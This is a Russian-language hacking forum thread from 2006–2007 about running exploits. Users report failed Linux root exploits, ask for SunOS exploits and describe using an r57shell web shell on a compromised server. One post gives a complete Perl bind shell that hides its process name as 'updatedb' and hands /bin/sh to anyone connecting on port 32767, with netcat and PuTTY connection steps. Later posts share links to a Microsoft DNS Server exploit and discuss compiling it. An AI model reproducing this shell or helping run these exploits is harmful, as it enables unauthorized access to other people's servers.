Запускаем сплойты

Discussion in 'Безопасность и Анонимность' started by Zitt, 4 Nov 2006.

  1. ground_zero

    ground_zero Elder - Старейшина

    Joined:
    11 Oct 2006
    Messages:
    398
    Likes Received:
    85
    Reputations:
    5
    нет не нормально если он самом деле висит как ты говориш а не выполняетса =)))
     
  2. gcc

    gcc Elder - Старейшина

    Joined:
    27 Jan 2007
    Messages:
    88
    Likes Received:
    9
    Reputations:
    0
    2.4.21-47.0.1.el тоже не порутилось, я так понимаю из-за того что пропатчено?
     
  3. KEZ

    KEZ Ненасытный школьник

    Joined:
    18 May 2005
    Messages:
    1,604
    Likes Received:
    754
    Reputations:
    397
    сплоент павис. зопускайте исчо рас.
     
  4. gcc

    gcc Elder - Старейшина

    Joined:
    27 Jan 2007
    Messages:
    88
    Likes Received:
    9
    Reputations:
    0
    может мне его еще в cron добавить? =)
     
  5. hsi

    hsi Member

    Joined:
    11 Sep 2006
    Messages:
    214
    Likes Received:
    61
    Reputations:
    7
    Просто сплойт не сработает на этой системе. Вот и все.
     
  6. gcc

    gcc Elder - Старейшина

    Joined:
    27 Jan 2007
    Messages:
    88
    Likes Received:
    9
    Reputations:
    0
    Может оффтоп, но: есть что нибудь рабочее под SunOS 5.8 ?
     
  7. ground_zero

    ground_zero Elder - Старейшина

    Joined:
    11 Oct 2006
    Messages:
    398
    Likes Received:
    85
    Reputations:
    5
    gcc забеги на http://www.milw0rm.com/ там много чево есть практически под всё и временами даже рабочее =)))
     
    1 person likes this.
  8. gcc

    gcc Elder - Старейшина

    Joined:
    27 Jan 2007
    Messages:
    88
    Likes Received:
    9
    Reputations:
    0
    2ground_zero, спасибо, но я просил не сайт с кучей сплоетов, а реально проверенный кем то из форумчан код. =)
    Могу вас заверить, что всю ночь до этого гуглил в поисках сабжа. И на милворме тоже был. причем в первую очередь.

    P.S. В данном случае еще и архитектура sparc =)
     
    #48 gcc, 15 Mar 2007
    Last edited: 15 Mar 2007
  9. nobi

    nobi Elder - Старейшина

    Joined:
    18 Jan 2007
    Messages:
    134
    Likes Received:
    16
    Reputations:
    0
    не запускается perl bind_port.pl

    вот решил заняться и сразу проб.
    незнал где спросить(в каком топике)решил тут
    короче есть шелл r57shell 1.31 с правами на запись
    я перехожу в папку sources и заливаю bind_port.pl
    потом выполняю команду perl bind_port.pl
    и жду жду и жду!и не че !зависло .пишет ожидает ответа с www.....
    в чём проблема? подскажите! может что-то не правильно делаю?
     
    #49 nobi, 22 Mar 2007
    Last edited by a moderator: 10 Nov 2007
  10. _Pantera_

    _Pantera_ Характерне козацтво

    Joined:
    6 Oct 2006
    Messages:
    186
    Likes Received:
    356
    Reputations:
    109
    perl bind_port.pl ip port
    и еще у себя не забудь откріть порт с помощью нет какта -l -p port .И указывай реальный свой ip а НЕ прокси
     
  11. nobi

    nobi Elder - Старейшина

    Joined:
    18 Jan 2007
    Messages:
    134
    Likes Received:
    16
    Reputations:
    0
    та тут вобше не выполняется perl
    или с начало надо на нет скане а потом пёрл-бин запускать
    подскажите плызз
     
  12. Zitt

    Zitt Elder - Старейшина

    Joined:
    7 May 2006
    Messages:
    736
    Likes Received:
    268
    Reputations:
    59
    nobi, попробуй с помощью шелла порт открыть. Читай пост тохи на первой странице темы
     
  13. KPOT_f!nd

    KPOT_f!nd положенец общага

    Joined:
    25 Aug 2006
    Messages:
    1,074
    Likes Received:
    502
    Reputations:
    65
    bind.pl
    perl /путь_до_скрипта/bind.pl
    потом с помощью putty или тот же NetCat => конектишься
    PHP:
    #!/usr/bin/perl

    $port 32767
    $port $ARGV[0] if $ARGV[0];
    exit if 
    fork;
    $
    "updatedb" " " x100;
    $SIG{CHLD} = 'IGNORE';
    use 
    Socket;
    socket(SPF_INETSOCK_STREAM0);
    setsockopt(SSOL_SOCKETSO_REUSEADDR1);
    bind(Ssockaddr_in($portINADDR_ANY));
    listen(S50);
    while(
    1)
    {
    accept(XS);
    unless(fork)
    {
    open STDIN"<&X";
    open STDOUT">&X";
    open STDERR">&X";
    close X;
    exec("/bin/sh");
    }
    close X;
    }
    NetCat => ip_адресс_ресурса 32767 (enter)
    putty => Host Name (or IP address) там пишим IP_адрес_ресурса(можно и просто адресс ресурса) => Port 32767 => OPEN
    скрин
     
    #53 KPOT_f!nd, 27 Mar 2007
    Last edited: 27 Mar 2007
  14. -=lebed=-

    -=lebed=- хэшкрякер

    Joined:
    21 Jun 2006
    Messages:
    3,804
    Likes Received:
    1,960
    Reputations:
    594
    Есть сплоент на С
    Лежит тут (скачал только по первой сссылке)
    http://www.514.es/Microsoft_Dns_Server_Exploit.zip
    http://www.48bits.com/exploits/dnsxpl.rar
    http://www.milw0rm.com/sploits/04152007-dnsxpl.rar
    (в архиве 4 файла Makefile, dnsxpl.Acf, dnsxplc.c, dnsxpl.Idl)
    Вопрос: я локально его не соберу у себя на компе под виндой? lcc-win32 ? (http://www.cs.virginia.edu/~lcc-win32/lccwin32.exe) Пробовал компилить выдаёт 260 ошибок.
    Пробовал переименовать dnsxpl.Idl в dnsxpl.h в папке includ - всё равно ошибки.

    P.S. Он наверно для никсов (исходник то, раз makefile есть) и я зря под виндой пытаюсь ?
     
  15. p-range

    p-range Elder - Старейшина

    Joined:
    5 Feb 2006
    Messages:
    137
    Likes Received:
    145
    Reputations:
    118
    попробуй откомпилить под cygwin'ом. компилит юниксовые сплоиты в *.exe
     
    #55 p-range, 17 Apr 2007
    Last edited: 17 Apr 2007
  16. ShadOS

    ShadOS ы

    Joined:
    11 Feb 2007
    Messages:
    667
    Likes Received:
    351
    Reputations:
    413
    Этот эксплоит сосвем не для *nix. собирается, по идее, он вполне нормально под Windows.
    dnsxpl.Idl - это файл interface defenition language (языка описания интерфейса). А насчёт makefile - жжоте =) Кто ж сказал что если makefile, то под никсы...

    UPD: однако собрать у меня тоже не получилось. Кроме того смущает наличие в сырцах:
    #include "dnsxpl.h"
    который отсутствует в архиве.
     
    #56 ShadOS, 17 Apr 2007
    Last edited: 17 Apr 2007
  17. -=lebed=-

    -=lebed=- хэшкрякер

    Joined:
    21 Jun 2006
    Messages:
    3,804
    Likes Received:
    1,960
    Reputations:
    594
    Дайте мне dns сервер вынь 2003 En - кому не жалко, затестю слоит от MSF 3.0 :D
     
  18. -=lebed=-

    -=lebed=- хэшкрякер

    Joined:
    21 Jun 2006
    Messages:
    3,804
    Likes Received:
    1,960
    Reputations:
    594
    Точнее во всех трёх архивах... ;)

    значит эта библиотека где-то должна быть!? В каком-то компиляторе ?
     
  19. ShadOS

    ShadOS ы

    Joined:
    11 Feb 2007
    Messages:
    667
    Likes Received:
    351
    Reputations:
    413
    Агррр... сам догадаешься или подсказать?!
    dnsxpl сокращение от DNS EXPLOIT. На самом деле эта библиотека там нах ненужна. Прототипы функций уже указанны.
     
  20. -=lebed=-

    -=lebed=- хэшкрякер

    Joined:
    21 Jun 2006
    Messages:
    3,804
    Likes Received:
    1,960
    Reputations:
    594
    Я вот не мойму, кроме ShadOS, исходники кто-нибудь посмотрел ? Я Си в школе узучал ещё и то поверхностно, щас даже синтаксис плохо помню, но, посмотрев код, там любой дурак (хоть кто более-менее знаком с программированием, поймёт, что что-то не так с dnsxpl.h. Придётся править сплоит самому полностю... (хотя бы добьюсь чтоб скомпилировался). В определении переменных - тоже ошибки, да и не соответствие типов имеет место... Где ВЫ кодеры на Cи - помогите сплоит подправить... ;)